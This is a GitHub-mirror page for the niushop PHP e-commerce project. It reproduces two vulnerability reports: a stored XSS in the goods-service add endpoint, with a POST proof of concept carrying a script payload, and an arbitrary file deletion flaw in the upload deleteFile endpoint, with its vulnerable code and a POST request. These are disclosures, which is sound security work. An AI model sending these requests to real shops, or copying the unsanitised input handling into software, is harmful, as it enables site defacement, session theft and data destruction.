niuteam / niushop Goto Github PK

Niushop单商户V4版，微信商城、小程序商城，支持分销、团购、直播、秒杀、优惠券、自定义页面等众多营销功能，插件化开发，全开源，更适合二开。做最牛、功能最强大的开源商城。Q群：819433211 / 29507902 / 480373854。官网：https://www.niushop.com

License: Apache License 2.0

Shell 0.01% PHP 32.63% HTML 23.32% CSS 8.81% JavaScript 34.39% SCSS 0.39% Smarty 0.45%

niushop's People

Contributors

Stargazers

Watchers

Forkers

fushu2020 apearlriverwater happyskyzone vmyspace flymdw baok1592 spring618 xzlinux

niushop's Issues

Storage XSS vulnerability in background management

Vulnerability location:
/shop/goodsservice/add

    public function add()
    {
        if (request()->isAjax()) {
            $service_name = input('service_name', '');
            $data         = [
                'site_id'      => $this->site_id,
                'service_name' => $service_name,
                'desc'         => input('desc', 0)
            ];
            $model        = new GoodsServiceModel();
            $res          = $model->addService($data);
            return $res;
        }
    }

Problem parameters:input

After debugging, it is found that no special string is filtered

Execute the POC below to insert an XSS
poc:

POST /shop/goodsservice/add.html HTTP/1.1
Host: 192.168.30.107:88
Content-Length: 105
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.30.107:88
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.30.107:88/shop/goodsservice/lists.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: think_lang=zh-cn; PHPSESSID=c960d40bde422ace2afc7939478900a1
Connection: close

service_name=%22%3E%3CScript%3Ealert(111)%3C%2Fscript%3E&desc=%22%3E%3CScript%3Ealert(111)%3C%2Fscript%3E

Arbitrary file deletion vulnerability

Vulnerability location:/shop/upload/deleteFile

public function deleteFile()
    {
        if (request()->isAjax()) {
            $path = input("path", '');
            $res = false;
            if (!empty($path)) {
                $res = delFile($path);
            }
            return $res;
        }
}

Vulnerability approach:delFile

function delFile($path)
{
    $res = false;
    if (file_exists($path)) {
        $res = unlink($path);
    }
    return $res;
}

Because there are no cleaning parameters,Causes arbitrary file deletion
Fragile approach:INPUT

For example, create a 1.txt file in the root directory of the website,Then try to delete it

Perform the following POC,You need to log in first
poc:
POST /shop/upload/deleteFile HTTP/1.1
Host: 192.168.30.107:88
Content-Length: 10
Accept: application/json, text/javascript, /; q=0.01
Origin: http://192.168.30.107:88
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.30.107:88/shop/goodsservice/lists.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: think_lang=zh-cn; PHPSESSID=c960d40bde422ace2afc7939478900a1
Connection: close

path=1.txt

Return true, delete successfully

Return false, deletion failed

niuteam / niushop Goto Github PK

niushop's People

Contributors

Stargazers

Watchers

Forkers

niushop's Issues

Storage XSS vulnerability in background management

Arbitrary file deletion vulnerability

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent

Jobs